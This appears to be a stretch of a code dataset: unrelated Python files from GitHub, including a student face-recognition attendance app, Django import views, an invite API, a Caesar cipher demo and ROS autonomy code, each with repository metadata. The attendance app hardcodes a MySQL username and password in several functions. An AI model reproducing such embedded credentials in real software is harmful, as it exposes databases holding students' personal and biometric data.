def update_data(self):\r\n if self.var_dep.get()==\"Select Department\" or self.var_std_name.get()==\"\" or self.var_std_id.get()==\"\":\r\n messagebox.showerror(\"Error\",\"All Fields are required\",parent=self.root)\r\n else:\r\n try:\r\n Update=messagebox.askyesno(\"Update\",\"Do you want to update this student details\",parent=self.root)\r\n if Update>0:\r\n conn=mysql.connector.connect(host=\"localhost\",username=\"guptayash\",password=\"Ash_12345\",database=\"face_manag\")\r\n my_cursor=conn.cursor()\r\n my_cursor.execute(\"update students set Dep=%s,course=%s,year=%s,Semester=%s,Name=%s,Division=%s,roll=%s,gender=%s,dob=%s,email=%s,phone=%s,address=%s,Teacher=%s,PhotoSample=%s where Student_id=%s\",((self.var_dep.get(),self.var_course.get(),self.var_year.get(),self.var_semester.get(),self.var_std_name.get(),self.var_div.get(),self.var_roll.get(),self.var_gender.get(),self.var_dob.get(),self.var_email.get(),self.var_phone.get(),self.var_address.get(),self.var_teacher.get(),self.var_radio1.get(),self.var_std_id.get())))\r\n\r\n\r\n else:\r\n if not Update:\r\n return \r\n messagebox.showinfo(\"Success\",\"Student details successfully udated\",parent=self.root)\r\n conn.commit()\r\n self.fetch()\r\n conn.close()\r\n except Exception as es:\r\n messagebox.showerror(\"Error\",f\"Due To:{str(es)}\",parent=self.root)\r\n \r\n #===========delete fnc=============\r\n def delete_data(self):\r\n if self.var_std_id.get()==\"\":\r\n messagebox.showerror(\"Error\",\"Student id is required\",parent=self.root)\r\n else:\r\n try:\r\n delete=messagebox.askyesno(\"Delete Student info\",\"Do you want to delete this student info\",parent=self.root)\r\n if delete>0:\r\n conn=mysql.connector.connect(host=\"localhost\",username=\"guptayash\",password=\"Ash_12345\",database=\"face_manag\")\r\n my_cursor=conn.cursor()\r\n sql=\"delete from students where Student_id=%s\"\r\n val=(self.var_std_id.get(),)\r\n my_cursor.execute(sql,val)\r\n else:\r\n if not delete:\r\n return\r\n conn.commit()\r\n self.fetch()\r\n conn.close()\r\n messagebox.showinfo(\"Delete\",\"Successfully deleted student details\",parent=self.root)\r\n except Exception as es:\r\n messagebox.showerror(\"Error\",f\"Due To:{str(es)}\",parent=self.root)\r\n\r\n #==========reset data=================\r\n def reset_data(self):\r\n self.var_dep.set(\"Select Department\")\r\n self.var_course.set(\"Select Course\")\r\n self.var_year.set(\"Select Year\")\r\n self.var_semester.set(\"Select Semester\")\r\n self.var_std_id.set(\"\")\r\n self.var_std_name.set(\"\")\r\n self.var_div.set(\"Select Division\")\r\n self.var_roll.set(\"\")\r\n self.var_gender.set(\"Male\")\r\n self.var_dob.set(\"\")\r\n self.var_email.set(\"\")\r\n self.var_phone.set(\"\")\r\n self.var_address.set(\"\")\r\n self.var_teacher.set(\"\")\r\n self.var_radio1.set(\"\")\r\n\r\n\r\n #****************Generate data set******************\r\n def generate_dataset(self):\r\n if self.var_dep.get()==\"Select Department\" or self.var_std_name.get()==\"\" or self.var_std_id.get()==\"\":\r\n messagebox.showerror(\"Error\",\"All Fields are required\",parent=self.root)\r\n else:\r\n try:\r\n conn=mysql.connector.connect(host=\"localhost\",username=\"guptayash\",password=\"Ash_12345\",database=\"face_manag\")\r\n my_cursor=conn.cursor()\r\n my_cursor.execute(\"select * from students\")\r\n myresult=my_cursor.fetchall()\r\n id=0\r\n for x in myresult:\r\n id+=1\r\n my_cursor.execute(\"update students set Dep=%s,course=%s,year=%s,Semester=%s,Name=%s,Division=%s,roll=%s,gender=%s,dob=%s,email=%s,phone=%s,address=%s,Teacher=%s,PhotoSample=%s where Student_id=%s\",((self.var_dep.get(),self.var_course.get(),self.var_year.get(),self.var_semester.get(),self.var_std_name.get(),self.var_div.get(),self.var_roll.get(),self.var_gender.get(),self.var_dob.get(),self.var_email.get(),self.var_phone.get(),self.var_address.get(),self.var_teacher.get(),self.var_radio1.get(),self.var_std_id.get()==id+1)))\r\n conn.commit()\r\n self.fetch()\r\n self.reset_data()\r\n conn.close()\r\n\r\n\r\n #*******************Load data on face frontals from opencv****************\r\n face_classifier=cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\")\r\n\r\n def face_cropped(img):\r\n gray=cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\r\n faces=face_classifier.detectMultiScale(gray,1.3,5)\r\n \r\n #Generating rectangle for faces\r\n for(x,y,w,h) in faces:\r\n face_cropped=img[y:y+h,x:x+w]\r\n return face_cropped\r\n \r\n cap=cv2.VideoCapture(0)\r\n img_id=0\r\n #Capturing Photos\r\n while True:\r\n r,frame1=cap.read()\r\n if face_cropped(frame1) is not None:\r\n img_id+=1\r\n face=cv2.resize(face_cropped(frame1),(450,450))\r\n face=cv2.cvtColor(face,cv2.COLOR_BGR2GRAY)\r\n file_name_path=\"data/user.\"+str(id)+\".\"+str(img_id)+\".jpg\"\r\n cv2.imwrite(file_name_path,face)\r\n cv2.putText(face,str(img_id),(50,50),cv2.FONT_HERSHEY_SIMPLEX,1.5,(0,255,0),2)\r\n cv2.imshow(\"Cropped Face\",face)\r\n \r\n if cv2.waitKey(1)==13 or int(img_id)==100:\r\n break\r\n \r\n cap.release()\r\n cv2.destroyAllWindows()\r\n messagebox.showinfo(\"Result\",\"Data Set Generated\")\r\n\r\n except Exception as es:\r\n messagebox.showerror(\"Error\",f\"Due To:{str(es)}\",parent=self.root)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n def run(self):\r\n self.root.mainloop()\r\n \r\n\r\n \r\n\r\n\r\n\r\nif __name__==\"__main__\":\r\n root=tk.Tk()\r\n app=Student(root)\r\n app.run()\r\n","repo_name":"yashg170/Face-Recognition-Attendance-System","sub_path":"studentdet.py","file_name":"studentdet.py","file_ext":"py","file_size_in_byte":22551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"7710472305","text":"# Desafio fazer um programa que leia um lista de nomes e escolha um nome aleatoriamente\nfrom random import choice\nnom1 = input('Primeiro auluno')\nnom2 = input('segundo aluno')\nnom3 = input('Terceiro aluno')\nnom4 = input('quarto aluno')\n# lista = []\nescolido = choice([nom1, nom2, nom3, nom4])\nprint(escolido)\n\n\n\n","repo_name":"VitorARG/exercicios-python","sub_path":"PythonExecicios/ex019.py","file_name":"ex019.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"16571439793","text":"\nfrom django.urls import path\nfrom .views import deleteTodo, detailTodo, home, liste,createTodo, updateTodo\n\nurlpatterns = [\n path('', home, name='home'),\n path('liste/', liste, name='liste'),\n path('create/', createTodo, name='create'),\n path('update/', updateTodo, name='update'),\n path('detail/', detailTodo, name='detail'),\n path('delete/', deleteTodo, name='delete'),\n\n]","repo_name":"mehmetakkoc/todo_django","sub_path":"todo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"23151559197","text":"FB_APP_ID = \"\"\nFB_REDIRECT_URI = \"\"\nFB_APP_SECRET = \"\"\n\nFB_OAUTH_DIALOG_URL = \"https://www.facebook.com/dialog/oauth?\"\nFB_ACCESS_TOKEN_URL = \"https://graph.facebook.com/oauth/access_token?\"\nFB_CURRENT_USER_URL = \"https://graph.facebook.com/me?\"\nFB_FEED_URL = \"https://graph.facebook.com/feed\"\n\nLASTFM_API_KEY = \"\"\n\nLASTFM_TOP_TRACKS_URL = \"http://ws.audioscrobbler.com/2.0/?\"\n\nNIKE_PLUS_USER_ID_URL = \"www.nikegadgets.com\"\nNIKE_PLUS_USER_ID_PATH = \"/socialsite/profileRedirect/\"\nNIKE_PLUS_URL = \"http://nikerunning.nike.com/nikeplus/v1/services/app/run_list.jsp?\"\n\nDATABASE_NAME = \"/home/ec2-user/shamer.db\"\nCRONTAB_FILE = \"/home/ec2-user/shamer-crontab\"\nCRONJOB_COMMAND = \"python /home/ec2-user/Public-Shamer/cronjobs.py\"\n","repo_name":"wsong/Public-Shamer","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"1803197290","text":"from core.decorators import request\nfrom core.errors import ExceptionWithStatusCode\nfrom core.responses import SuccessResponse\nfrom service.invite_service import InviteService\n\nclass InviteController:\n \"\"\"\n InviteController controller.\n\n This controller handles all requests to the /user/:userId/invites endpoint.\n\n Attributes that can be found in request object:\n params - The :userId parameter\n query_params - The query parameters (if any)\n ctx - The context object\n headers - The HTTP headers from the request\n body - The body of the request (if any)\n \"\"\"\n \n @request\n def get_specific_invite(self, request):\n response = InviteService.get_invite_by_id(\n request.params.get('inviteId', '')\n )\n return SuccessResponse(response), 200\n\n @request\n def get_disable_specific_invite(self, request):\n response = InviteService.disable_invite_code(\n request.params.get('inviteId', '')\n )\n return SuccessResponse(response), 200\n\n @request\n def get_all_invites_for_user(self, request):\n show_active = request.query_params.get('active', 'true').lower() == 'true'\n response = InviteService.get_all_invites(\n request.headers.get('X-User', None),\n show_active\n )\n return SuccessResponse(response), 200\n\n @request\n def post_new_invite(self, request):\n response = InviteService.create_invite_code(request.headers.get('X-User', None), request.body)\n return SuccessResponse(response), 201\n\n @request\n def put_update_invite(self, request):\n response = InviteService.update_invite(request.headers.get('X-User', None), request.params.get('inviteId', None), request.body)\n return SuccessResponse(response), 200\n \n @request\n def delete_invite(self, request):\n InviteService.delete_invite(request.headers.get('X-User', None), request.params.get('inviteId', None))\n return None, 204","repo_name":"zaBogdan/CloudComputing","sub_path":"users-service/src/controllers/invite_controller.py","file_name":"invite_controller.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"41881480386","text":"def caesar_encrypt_caps():\n #encryption for caps using caesar cipher\n msg = input(\"Enter the message to encrypt:\\t\")\n shift = input(\"Enter the encryption key:\\t\")\n\n if shift !=\"\":\n shift = int(shift)\n\n shift_encrypt_method(shift, msg)\n\n else:\n shift = 3\n shift_encrypt_method(shift, msg)\n\n\ndef caesar_decrypt_caps():\n #encryption for caps using caesar cipher\n msg = input(\"Enter the message to decrypt:\\t\")\n shift = input(\"Enter the encryption key:\\t\")\n\n if shift !=\"\":\n shift = int(shift)\n\n shift_decrypt_method(shift, msg)\n\n else:\n shift = 3\n shift_decrypt_method(shift, msg)\n\n\ndef shift_encrypt_method(shift,msg):\n encrypted_msg = \"\"\n for c in msg:\n #check if character is an uppercase letter\n if c.isupper():\n # find the position in 0-25\n c_index = ord(c) - ord(\"A\")\n #perform the shift\n new_index = (c_index + shift) % 26\n #convert character\n new_unicode = new_index + ord(\"A\")\n new_char = chr(new_unicode)\n\n #append to encrypted string\n encrypted_msg = encrypted_msg + new_char\n else:\n #leave as it is\n encrypted_msg += c\n\n print(\"Orginial message:\\t\", msg)\n print(\"Encrypted message:\\t\", encrypted_msg)\n\n\ndef shift_decrypt_method(shift,msg):\n decrypted_msg = \"\"\n\n for c in msg:\n\n # check if character is an uppercase letter\n if c.isupper():\n # find the position in 0-25\n c_index = ord(c) - ord(\"A\")\n # perform the negative shift\n new_index = (c_index - shift) % 26\n # convert to new character\n new_unicode = new_index + ord(\"A\")\n new_char = chr(new_unicode)\n # append to plain string\n decrypted_msg = decrypted_msg + new_char\n else:\n #leave it as it is\n decrypted_msg += c\n\n print(\"Encrypted message:\\t\", msg)\n print(\"Decrypted message:\\t\", decrypted_msg)\n\ndef caesar_encrypt():\n shift = 3 # defining the shift count\n text = \"HELLO WORLD\"\n encryption = \"\"\n for c in text:\n # check if character is an uppercase letter\n if c.isupper():\n # find the position in 0-25\n c_unicode = ord(c)\n c_index = ord(c) - ord(\"A\")\n # perform the shift\n new_index = (c_index + shift) % 26\n # convert to new character\n new_unicode = new_index + ord(\"A\")\n\n new_character = chr(new_unicode)\n\n # append to encrypted string\n encryption = encryption + new_character\n\n else:\n\n # since character is not uppercase, leave it as it is\n encryption += c\n \n print(\"Plain text:\",text)\n\n print(\"Encrypted text:\",encryption)\n\n\ndef caesar_decrypt():\n shift = 3 # defining the shift count\n encrypted_text = \"KHOOR ZRUOG\"\n plain_text = \"\"\n\n for c in encrypted_text:\n\n # check if character is an uppercase letter\n if c.isupper():\n\n # find the position in 0-25\n c_unicode = ord(c)\n\n c_index = ord(c) - ord(\"A\")\n\n # perform the negative shift\n new_index = (c_index - shift) % 26\n\n # convert to new character\n new_unicode = new_index + ord(\"A\")\n\n new_character = chr(new_unicode)\n\n # append to plain string\n plain_text = plain_text + new_character\n\n else:\n\n # since character is not uppercase, leave it as it is\n plain_text += c\n\n print(\"Encrypted text:\",encrypted_text)\n\n print(\"Decrypted text:\",plain_text)\n\ncaesar_decrypt_caps()\n#caesar_encrypt_caps()\n","repo_name":"briannaBrie/Cryptography","sub_path":"caesar_cipher.py","file_name":"caesar_cipher.py","file_ext":"py","file_size_in_byte":3761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"4505275387","text":"from django.shortcuts import render, redirect\nfrom django.shortcuts import render_to_response \nfrom django.conf import settings\nfrom django.core.files.storage import FileSystemStorage\n\nfrom importationfichier.models import Document\nfrom backoffice.models import *\nfrom accueil_login.views import home\nfrom django.contrib.auth.models import User, Group\n\nfrom .forms import *\nimport os, os.path, string \nfrom os.path import basename\nimport csv\n\ndef rechercheListe(liste,elt):\n\tfor x in liste:\n\t\tif x == elt:\n\t\t\treturn(True)\n\treturn(False)\n\n\ndef nouveau_document(request):\n\tlist_user_group = []\n\tuser = User.objects.filter(groups__name='Gestionnaire_de_donnees')\n\tfor tmp in user:\n\t\tlist_user_group.append(tmp.id)\n\n\tif request.user.is_authenticated :\n\t\tif rechercheListe(list_user_group,request.user.id) or request.user.is_staff :\n\t\t\tform = UploadFileForm(request.POST or None, request.FILES)\n\t\t\treturn render(request, 'importationfichier/home.html', {\n\t\t\t\t'form': form\n\t\t\t\t})\n\t\treturn redirect(home)\n\telse :\n\t\treturn redirect(home)\n\n\ndef upload(request):\n\tlist_user_group = []\n\tuser = User.objects.filter(groups__name='Gestionnaire_de_donnees')\n\tfor tmp in user:\n\t\tlist_user_group.append(tmp.id)\n\tif request.user.is_authenticated :\n\t\tif rechercheListe(list_user_group,request.user.id) or request.user.is_staff:\n\t\t\tform = UploadFileForm(request.POST or None, request.FILES)\n\t\t\trequest.session['sauvegarde'] = False\n\t\t\tdocument = Document()\n\t\t\tif form.is_valid():\n\t\t\t\tdocument.description = form.cleaned_data[\"title\"]\n\t\t\t\tdocument.file = form.cleaned_data[\"file\"]\n\t\t\t\tdocument.importer = False\n\t\t\t\t#if os.path.splitext(str)[1] == '.txt':\n\t\t\t\tif document.file :\n\t\t\t\t\tdocument.save()\n\t\t\t\t\trequest.session['sauvegarde'] = True\n\t\t\telse :\n\t\t\t\tdocument.file = None\n\t\t\treturn render(request, 'importationfichier/upload.html', { 'name_file': document.file })\n\t\treturn redirect(home)\n\telse :\n\t\treturn redirect(home)\n\ndef import_bdd(request):\n\ti = 0 # accumulateur\n\tdocs = Document.objects.all()\n\trequest.session['nbr_fichier_bdd'] = False\n\trequest.session['nbr_fichier_serveur'] = False\n\tlist_user_group = []\n\tuser = User.objects.filter(groups__name='Gestionnaire_de_donnees')\n\tfor tmp in user:\n\t\tlist_user_group.append(tmp.id)\n\tif request.user.is_authenticated :\n\t\tif rechercheListe(list_user_group,request.user.id) or request.user.is_staff:\n\t\t\twhile i < len(docs) :\n\t\t\t\tif docs[i].importer :\n\t\t\t\t\trequest.session['nbr_fichier_bdd'] = True\n\t\t\t\t\tprint(i)\n\t\t\t\telse :\n\t\t\t\t\trequest.session['nbr_fichier_serveur'] = True\n\t\t\t\ti = i + 1\n\t\t\tprint(i)\n\t\t\tprint(request.session['nbr_fichier_serveur'])\n\t\t\tprint(request.session['nbr_fichier_bdd'])\n\t\t\treturn render(request, 'importationfichier/importbdd.html',{ 'document' : docs})\n\t\treturn redirect(home)\n\telse :\n\t\treturn redirect(home)\n\n\ndef upload_bdd(request,id_file):\n\timport os\n\tdocs = Document.objects.get(pk=id_file)\n\trequest.session['importation_bdd'] = False\n\trequest.session['nbr_ligne_erreur_bdd'] = False\n\tfile_name = \"media/\" + str(docs.file)\n\ti = 0 # itterateur pour le nombre de ligne dans le fichier\n\tdonnees = [] # permet de stocker les valeurs du fichier dans un tableau de tableau\n\tdonnees_brutes = [] # permet de stocker les valeurs du fichier dans un tableau ce sont des lignes\n\tligne_erreurs = []\n\tfileName, fileExtension = os.path.splitext(basename(file_name))\n\tlist_user_group = []\n\tuser = User.objects.filter(groups__name='Gestionnaire_de_donnees')\n\tfor tmp in user:\n\t\tlist_user_group.append(tmp.id)\n\tif request.user.is_authenticated :\n\t\tif rechercheListe(list_user_group,request.user.id) or request.user.is_staff:\n\t\t\t#IMPORTATION FICHIER TXT\n\n\t\t\tif docs.importer == 0 and fileExtension == '.txt':\n\t\t\t\tfichier = open(file_name,'r', encoding='cp1252')\n\t\t\t\thead = fichier.readline()\n\n\n\t\t\t#IMPORTATION FICHIER ADDRESSE ELEVES\n\t\t\t\tif file_name.lower().find(\"adr\") >= 0:\n\t\t\t\t\tprint(\"okkkjlkjk\")\n\t\t\t\t\tprint(\"okkkk\")\n\t\t\t\t\tfor line in fichier:\n\t\t\t\t\t\tdonnees.append(line.split(\"\\t\"))\n\t\t\t\t\t\tdonnees_brutes.append(line)\n\t\t\t\t\t\ttry : \n\t\t\t\t\t\t\tprint(line)\n\t\t\t\t\t\t\tEleve(adresse=\"NULL\",\n\t\t\t\t\t\t\t\tid=donnees[i][3].replace(\"\\n\",\"\"),\n\t\t\t\t\t\t\t\tcodepostal=donnees[i][0],\n\t\t\t\t\t\t\t\tville = donnees[i][1],\n\t\t\t\t\t\t\t\tpays=donnees[i][2]).save()\n\t\t\t\t\t\texcept :\n\t\t\t\t\t\t\tdonnees_brutes.append(line)\n\t\t\t\t\t\t\trequest.session['nbr_ligne_erreur_bdd'] = True\n\t\t\t\t\t\t\tligne_erreurs.append(\"Ligne \" + str(i+1) + \" : \" +line)\n\t\t\t\t\t\ti = i + 1\n\t\t\t\t\tprint(\"Nombre de lignes dans le fichier\",i)\n\t\t\t\t\tdocs.importer = True\n\t\t\t\t\trequest.session['importation_bdd'] = True\n\t\t\t\t\tdocs.save()\n\t\t\t\t\treturn render(request, 'importationfichier/uploadbdd.html', { 'documents': docs ,'ligne_erreurs' :ligne_erreurs, 'donnees' : donnees_brutes})\n\n\t\t\t#IMPORTATION FICHIER STAGES\n\n\t\t\t\tif file_name.lower().find(\"stage\") >= 0:\n\t\t\t\t\tprint(\"okkkk\")\n\n\t\t\t\t\tfor line in fichier:\n\t\t\t\t\t\tdonnees.append(line.split(\"\\t\"))\n\t\t\t\t\t\tprint(\"caca\",len(donnees[i][8].replace(\"\\n\",\"\")))\n\t\t\t\t\t\tprint(\"caca2\",(donnees[i][8].replace(\"\\n\",\"\")))\n\t\t\t\t\t\tprint(\"en cours\",i)\n\t\t\t\t\t\ttmp = Eleve.objects.get(pk=donnees[i][8].replace(\"\\n\",\"\"))\n\t\t\t\t\t\ttry : \n\t\t\t\t\t\t\ttmp = Eleve.objects.get(pk=donnees[i][8].replace(\"\\n\",\"\"))\n\t\t\t\t\t\t\tStage(\n\t\t\t\t\t\t\t\tannee=donnees[i][0],\n\t\t\t\t\t\t\t\tanneescolaire=donnees[i][1],\n\t\t\t\t\t\t\t\tentreprise=donnees[i][2],\n\t\t\t\t\t\t\t\tcodepostal=donnees[i][3],\n\t\t\t\t\t\t\t\tville = donnees[i][4],\n\t\t\t\t\t\t\t\tpays=donnees[i][5],\n\t\t\t\t\t\t\t\tsujet=donnees[i][6],\n\t\t\t\t\t\t\t\tsalaire=donnees[i][7],\n\t\t\t\t\t\t\t\tideleve =tmp).save()\n\t\t\t\t\t\texcept :\n\t\t\t\t\t\t\tdonnees_brutes.append(line)\n\t\t\t\t\t\t\trequest.session['nbr_ligne_erreur_bdd'] = True\n\t\t\t\t\t\t\tligne_erreurs.append(\"Ligne \" + str(i+1) + \" : \" +line)\n\t\t\t\t\t\ti = i + 1\n\t\t\t\t\tprint(\"Nombre de lignes dans le fichier\",i)\n\t\t\t\t\tdocs.importer = True\n\t\t\t\t\trequest.session['importation_bdd'] = True\n\t\t\t\t\tdocs.save()\n\n\t\t\t#IMPORTATION FICHIER PROGRAMMES\n\n\t\t\t\tif file_name.lower().find(\"prg\") >= 0:\n\t\t\t\t\tprint(\"okkkk\")\n\t\t\t\t\tfor line in fichier:\n\t\t\t\t\t\tdonnees.append(line.split(\"\\t\"))\n\t\t\t\t\t\tprint(\"en cours\",i)\n\t\t\t\t\t\ttry : \n\t\t\t\t\t\t\ttmp = Eleve.objects.get(pk=donnees[i][0].replace(\"\\n\",\"\"))\n\t\t\t\t\t\t\tSpecialitecampus(\n\t\t\t\t\t\t\t\tideleve=tmp,\n\t\t\t\t\t\t\t\tprogramme=donnees[i][1],\n\t\t\t\t\t\t\t\tcampus=donnees[i][3],\n\t\t\t\t\t\t\t\tanneescolaire=donnees[i][2]).save()\n\t\t\t\t\t\texcept :\n\t\t\t\t\t\t\tdonnees_brutes.append(line)\n\t\t\t\t\t\t\trequest.session['nbr_ligne_erreur_bdd'] = True\n\t\t\t\t\t\t\tligne_erreurs.append(\"Ligne \" + str(i+1) + \" : \" +line)\n\t\t\t\t\t\ti = i + 1\n\t\t\t\t\tprint(\"Nombre de lignes dans le fichier\",i)\n\t\t\t\t\tdocs.importer = True\n\t\t\t\t\trequest.session['importation_bdd'] = True\n\t\t\t\t\tdocs.save()\n\n\t\t\t#IMPORTATION FICHIER CSV\n\n\t\t\tif docs.importer == 0 and fileExtension == '.csv':\n\t\t\t\tif file_name.lower().find(\"adr\") >= 0:\n\t\t\t\t\tfichier = open(file_name,'rt', encoding='cp1252')\n\t\t\t\t\treader = csv.reader(fichier)\n\t\t\t\t\tfor ligne in reader:\n\t\t\t\t\t\tdel ligne[4] #supprime le dernier element de la liste\n\t\t\t\t\t\tif i != 0:\n\t\t\t\t\t\t\tEleve(adresse=\"NULL\",\n\t\t\t\t\t\t\t\tid=ligne[3],\n\t\t\t\t\t\t\t\tcodepostal=ligne[0],\n\t\t\t\t\t\t\t\tville = ligne[1],\n\t\t\t\t\t\t\t\tpays=ligne[2]).save()\n\t\t\t\t\t\t\n\t\t\t\t\t\t\tdonnees_brutes.append(ligne)\n\t\t\t\t\t\t\trequest.session['nbr_ligne_erreur_bdd'] = True\n\t\t\t\t\t\t\tligne_erreurs.append(\"Ligne \" + str(i+1) + \" : \" + \" \".join(ligne))\n\t\t\t\t\t\ti = i + 1\n\t\t\t\t\tprint(\"Nombre de lignes dans le fichier\",i)\n\t\t\t\t\tdocs.importer = True\n\t\t\t\t\trequest.session['importation_bdd'] = True\n\t\t\t\t\tdocs.save()\n\n\t\t\t\tif file_name.lower().find(\"prg\") >= 0:\n\t\t\t\t\tfichier = open(file_name,'rt', encoding='cp1252')\n\t\t\t\t\treader = csv.reader(fichier)\n\t\t\t\t\tfor ligne in reader:\n\t\t\t\t\t\tprint(\"nem : \",i)\n\t\t\t\t\t\t #supprime le dernier element de la liste\n\t\t\t\t\t\tif i != 0:\n\t\t\t\t\t\t\tprint(ligne)\n\t\t\t\t\t\t\ttmp = Eleve.objects.get(pk=ligne[0])\n\t\t\t\t\t\t\tSpecialitecampus(\n\t\t\t\t\t\t\t\tideleve=tmp,\n\t\t\t\t\t\t\t\tprogramme=ligne[1],\n\t\t\t\t\t\t\t\tcampus=ligne[3],\n\t\t\t\t\t\t\t\tanneescolaire=ligne[2]).save()\n\t\t\t\t\t\t\n\t\t\t\t\t\t\tdonnees_brutes.append(ligne)\n\t\t\t\t\t\t\trequest.session['nbr_ligne_erreur_bdd'] = True\n\t\t\t\t\t\t\tligne_erreurs.append(\"Ligne \" + str(i+1) + \" : \" + \" \".join(ligne))\n\t\t\t\t\t\ti = i + 1\n\t\t\t\t\tprint(\"Nombre de lignes dans le fichier\",i)\n\t\t\t\t\tdocs.importer = True\n\t\t\t\t\trequest.session['importation_bdd'] = True\n\t\t\t\t\tdocs.save()\n\t\t\treturn redirect(home)\n\telse :\n\t\treturn redirect(home)\n\n\treturn render(request,'importationfichier/uploadbdd.html', { 'documents': docs ,'ligne_erreurs' :ligne_erreurs, 'donnees' : donnees_brutes})\n\ndef delete_file(request,id_file):\n\tlist_user_group = []\n\tuser = User.objects.filter(groups__name='Gestionnaire_de_donnees')\n\tfor tmp in user:\n\t\tlist_user_group.append(tmp.id)\n\tif request.user.is_authenticated :\n\t\tif rechercheListe(list_user_group,request.user.id) or request.user.is_staff:\n\t\t\ttry :\n\t\t\t\tdocs = Document.objects.get(pk=id_file)\n\t\t\t\tos.remove(docs.file.path)\n\t\t\t\tdocs.delete()\n\t\t\t\trequest.session['delete_file'] = True\n\t\t\texcept:\n\t\t\t\tdocs = None\n\t\t\t\trequest.session['delete_file'] = False\n\t\t\treturn render(request, 'importationfichier/delete_file.html',{'docs' : docs})\n\t\treturn redirect(home)\n\telse :\n\t\treturn redirect(home)\n\ndef delete_base_eleve(request):\n\tlist_user_group = []\n\tuser = User.objects.filter(groups__name='Gestionnaire_de_donnees')\n\tfor tmp in user:\n\t\tlist_user_group.append(tmp.id)\n\tif request.user.is_authenticated :\n\t\tif rechercheListe(list_user_group,request.user.id) or request.user.is_staff:\n\t\t\ttry :\n\t\t\t\tEleve.objects.all().delete()\n\t\t\t\trequest.session['delete_base'] = True\n\t\t\texcept:\n\t\t\t\trequest.session['delete_base'] = False\n\t\t\treturn render(request, 'importationfichier/delete_base.html',{'nom' : \"élèves\"})\n\t\treturn redirect(home)\n\telse :\n\t\treturn redirect(home)\n\ndef delete_base_stage(request):\n\tlist_user_group = []\n\tuser = User.objects.filter(groups__name='Gestionnaire_de_donnees')\n\tfor tmp in user:\n\t\tlist_user_group.append(tmp.id)\n\tif request.user.is_authenticated :\n\t\tif rechercheListe(list_user_group,request.user.id) or request.user.is_staff:\n\t\t\ttry :\n\t\t\t\tStage.objects.all().delete()\n\t\t\t\trequest.session['delete_base'] = True\n\t\t\texcept:\n\t\t\t\trequest.session['delete_base'] = False\n\t\t\treturn render(request, 'importationfichier/delete_base.html',{'nom' : \"stage\"})\n\t\treturn redirect(home)\n\telse :\n\t\treturn redirect(home)\ndef delete_base_programme(request):\n\tlist_user_group = []\n\tuser = User.objects.filter(groups__name='Gestionnaire_de_donnees')\n\tfor tmp in user:\n\t\tlist_user_group.append(tmp.id)\n\tif request.user.is_authenticated :\n\t\tif rechercheListe(list_user_group,request.user.id) or request.user.is_staff:\n\t\t\ttry :\n\t\t\t\tSpecialitecampus.objects.all().delete()\n\t\t\t\trequest.session['delete_base'] = True\n\t\t\texcept:\n\t\t\t\trequest.session['delete_base'] = False\n\t\t\treturn render(request, 'importationfichier/delete_base.html',{'nom' : \"programmes\"})\n\t\treturn redirect(home)\n\telse :\n\t\treturn redirect(home)\t\n","repo_name":"florinouzerr/statseisti","sub_path":"importationfichier/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10564,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"193154279","text":"from datetime import datetime\nimport json\nimport rospy\nfrom std_msgs.msg import Float32, Float64, Bool, String, Float32MultiArray\nfrom geometry_msgs.msg import Pose, PoseWithCovarianceStamped\nfrom diff_drive.msg import Goal, GoalPath, Constants, Linear, Angular\nfrom .path import AutoGoal, AutoPath, Autons\nimport time\nimport rospkg \nimport math\n\nglobal data\ndata = []\n\ndef read_json():\n \"\"\" This reads the auton data and saves it to a list to be used \"\"\"\n try:\n rospack = rospkg.RosPack()\n file_path = rospack.get_path('autonomous') + \"/src/auton_scripts/auton_modules/path-editor/data.txt\"\n with open(file_path) as json_file:\n json_data = json.load(json_file)\n\n new_data = []\n for d in json_data:\n a = Autons(len(new_data))\n a.deserialize_json(d)\n new_data.append(a)\n\n global data\n data = new_data\n except:\n read_json()\n \nread_json()\n\nclass State(object):\n \"\"\"\n We define a state object which provides some utility functions for the\n individual states within the state machine.\n \"\"\"\n\n def __init__(self, ros_node):\n self.ros_node = ros_node\n self.initialize()\n self.action_executed = False\n\n self.start_time = time.time()\n\n def log_state(self):\n \"\"\" Logs the name of the State \"\"\"\n rospy.loginfo(\"STATE: %s [%s]\" %(self.__class__.__name__, 15 - self.ros_node.get_time()))\n \n # Counts the amount of time \n def start_timer(self):\n \"\"\" Used to start a timer that counts time within a state \"\"\"\n self.start_time = time.time()\n\n def check_timer(self, wanted_time):\n \"\"\" Checks if the amount of time given has passed \"\"\"\n if time.time() - self.start_time >= wanted_time:\n return True\n return False\n\n # Function for working with wrapping angles\n def wrap_angle(self, angle):\n if angle < 0.0:\n return (math.pi * 2) + angle\n elif angle >= (math.pi * 2):\n return angle - (math.pi * 2)\n\n return angle\n \n # Get data\n def get_path(self):\n return self.ros_node.get_data(\"/pathTable/status/path\")\n\n def get_point(self):\n return self.ros_node.get_data(\"/pathTable/status/point\")\n \n def get_ball_count(self):\n return self.ros_node.get_data(\"/auto/numBall\")\n\n def finished_path(self, path_num):\n string_array = self.ros_node.get_data(\"/pathTable/status/finishedPath\").split()\n\n if (string_array[0] == \"true\" and int(string_array[1]) >= path_num):\n return True\n else:\n return False\n\n # This runs in the child class when created\n def initialize(self):\n pass\n\n # This runs once in the child class\n def execute_action(self):\n pass\n\n # This runs in a loop in the child class\n def tick(self):\n pass\n\n # This makes it so that the functions created in the child class act as they should\n def update(self):\n if not self.action_executed:\n self.execute_action()\n self.action_executed = True\n return 